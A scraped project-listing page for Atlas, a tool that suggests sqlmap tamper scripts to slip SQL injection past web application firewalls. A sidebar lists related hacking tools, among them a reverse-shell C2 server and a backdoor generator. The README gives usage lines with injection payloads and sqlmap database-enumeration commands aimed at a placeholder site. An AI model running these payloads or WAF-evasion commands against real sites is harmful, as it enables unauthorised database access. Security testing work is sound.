Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

🔗 Don't know what type of hash it is? Name That Hash will name that hash type! 🤖 Identify MD5, SHA256 and 3000+ other hashes ☄ Comes with a neat web app 🔥

Stars: ✭ 540 (-20.47%)

Mutual labels: hacking, tool

Fselect

Find files with SQL-like queries

Stars: ✭ 3,103 (+357%)

Mutual labels: sql, tool

Oxidtools

200 TOOLS BY 0XID4FF0X FOR TERMUX

Stars: ✭ 143 (-78.94%)

Mutual labels: sql, hacking

Slack Sql

🎉 Bring SQL console to Slack

Stars: ✭ 115 (-83.06%)

Mutual labels: sql, tool

Xspear

Powerfull XSS Scanning and Parameter analysis tool&gem

Stars: ✭ 583 (-14.14%)

Mutual labels: hacking, tool

Hacking

hacker, ready for more of our story ! 🚀

Stars: ✭ 413 (-39.18%)

Mutual labels: hacking, tool

Hrshell

HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.

Stars: ✭ 193 (-71.58%)

Mutual labels: hacking, injection

Djangohunter

Tool designed to help identify incorrectly configured Django applications that are exposing sensitive information.

Stars: ✭ 212 (-68.78%)

Mutual labels: hacking, tool

Hackerpro

All in One Hacking Tool for Linux & Android (Termux). Make your linux environment into a Hacking Machine. Hackers are welcome in our blog

Stars: ✭ 474 (-30.19%)

Mutual labels: hacking, tool

Thefatrat

Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV softw…

Stars: ✭ 5,944 (+775.41%)

Mutual labels: hacking, tool

View All Similar Projects ➔

Atlas - Quick SQLMap Tamper Suggester v1.0

Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.

Screen

Installation

$ git clone https://github.com/m4ll0k/Atlas.git atlas
$ cd atlas
$ python atlas.py # python3+

Usage

$ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

injection point (with %%inject%%):

get:

$ python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

post:

$ python atlas.py --url http://site.com/index/id/ -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

headers:

$ python atlas.py --url http://site.com/index/id/ -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

tampers concatenation:

$ python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v

get tampers list:

$ python atlas.py -g

Example

Run SQLMap:

$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3

Price_ASC') AND 8716=4837 AND ('yajr'='yajr is blocked by WAF/IDS/IPS, now trying with Atlas:

$ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v

At this point:

$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords,...

The new Update get will soon stay updated

$ BurpSuite

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].

Stars: ✭ 679

Visit Git Page 🔗Visit User Page 🔗Visit Issues Page (9) 🔗